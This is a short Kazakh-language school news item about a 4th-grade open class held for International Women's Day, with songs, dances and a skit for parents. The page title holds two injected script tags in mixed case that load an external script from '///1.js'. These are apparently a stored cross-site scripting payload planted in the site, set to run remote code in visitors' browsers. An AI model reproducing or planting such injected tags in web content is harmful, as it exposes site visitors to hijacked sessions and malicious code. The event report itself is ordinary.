Ашық сабақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2024 “Астрахан ауылының N1 ЖОББМ”КММ-нің 4”Ә”сынып оқушыларымен наурыз айының 6-сы күні Ар-ұят және Талап құндылықтары бойынша 8-наурыз халықаралық аналар мерекесіне орай “Сыйынар ем ана деген тәңірге”атты мерекелік ашық тәрбие сағаты өтті.Тәрбие сағатының мақсаты:Ана жайлы тамаша сөздер, өлеңдер, әндер арқылы аналар мен аруларды мерекемен құттықтау, оқушыларды мейірімділікке, ұстамдылыққа тәрбиелеу, ұстазға ата-анаға деген құрмет сыйын арттыру, ана еңбегін қадірлей білуге үйрету. Оқушылар ән айтып, би билеп, "Ананың жұмбағы" атты көрініс көрсетіп, ата-аналарына жылы лебіздерін білдірді. Мектеп директоры Г. Шонгалова ата-аналар мен оқушыларды мерекемен құттықтады. Сынып жетекшісі: Отениязова А.А
Просмотров: 390


Пікір қосу



Деректерді қолтаңбаға қосу